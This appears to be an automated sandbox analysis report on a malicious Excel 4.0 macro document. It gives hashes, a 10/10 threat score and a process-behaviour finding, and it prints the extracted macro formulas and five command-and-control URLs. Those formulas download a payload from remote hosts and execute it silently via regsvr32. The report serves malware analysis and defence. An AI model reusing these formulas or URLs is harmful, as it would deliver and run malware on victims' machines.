General

  • Target

    7ac32d506f20689756a895f8825945954af091335d6f8387b6b36808d3d1fc9c

  • Size

    90KB

  • Sample

    241120-2pfjdszkcn

  • MD5

    b4cf8a517aa0695ee3ee1b49510bdd09

  • SHA1

    ef326a415f65d08d2ac500330df76e55945764b5

  • SHA256

    7ac32d506f20689756a895f8825945954af091335d6f8387b6b36808d3d1fc9c

  • SHA512

    1e89664070d8b9a755505f5f049a91b4bc6eb36e8a0402b6b1834eb5fe0e8dcd4666aafbbab6d033aaaec22bd93cca2ab91867d65a5bf03fe008877ff43419af

  • SSDEEP

    1536:jQBrnXpnyV+ns1BVi/IEh2hx0Lx3bKhllGGx0vKCEjdQjqEk+xXPd:KDpyVEoBo6hKb4llGsQjbxfd

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://www.ajaxmatters.com/c7g8t/zbBYgukXYxzAF2hZc/

http://www.beholdpublications.com/home/BABxyyWZx8Vu/

http://explorationit.com/screwing/AxLm/

http://donboscoschoolputhuppally.org/wp-content/UuQ7LBsPoGu9Q/

http://myclassroomtime.com/mongery/ZlPsROtQiXIujmJmAA/

Attributes
  • formulas

    =FORMULA()
    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.ajaxmatters.com/c7g8t/zbBYgukXYxzAF2hZc/","..\xxw1.ocx",0,0)
    =IF('EGFAGAGDGE'!D15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.beholdpublications.com/home/BABxyyWZx8Vu/","..\xxw1.ocx",0,0))
    =IF('EGFAGAGDGE'!D17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://explorationit.com/screwing/AxLm/","..\xxw1.ocx",0,0))
    =IF('EGFAGAGDGE'!D19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://donboscoschoolputhuppally.org/wp-content/UuQ7LBsPoGu9Q/","..\xxw1.ocx",0,0))
    =IF('EGFAGAGDGE'!D21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://myclassroomtime.com/mongery/ZlPsROtQiXIujmJmAA/","..\xxw1.ocx",0,0))
    =IF('EGFAGAGDGE'!D23<0,CLOSE(0),)
    =EXEC("C:\Windows\SysWow64\regsvr32.exe /s ..\xxw1.ocx")
    =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://www.ajaxmatters.com/c7g8t/zbBYgukXYxzAF2hZc/

Targets

    • Target

      7ac32d506f20689756a895f8825945954af091335d6f8387b6b36808d3d1fc9c

    • Size

      90KB

    • MD5

      b4cf8a517aa0695ee3ee1b49510bdd09

    • SHA1

      ef326a415f65d08d2ac500330df76e55945764b5

    • SHA256

      7ac32d506f20689756a895f8825945954af091335d6f8387b6b36808d3d1fc9c

    • SHA512

      1e89664070d8b9a755505f5f049a91b4bc6eb36e8a0402b6b1834eb5fe0e8dcd4666aafbbab6d033aaaec22bd93cca2ab91867d65a5bf03fe008877ff43419af

    • SSDEEP

      1536:jQBrnXpnyV+ns1BVi/IEh2hx0Lx3bKhllGGx0vKCEjdQjqEk+xXPd:KDpyVEoBo6hKb4llGsQjbxfd

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

MITRE ATT&CK Enterprise v15

Tasks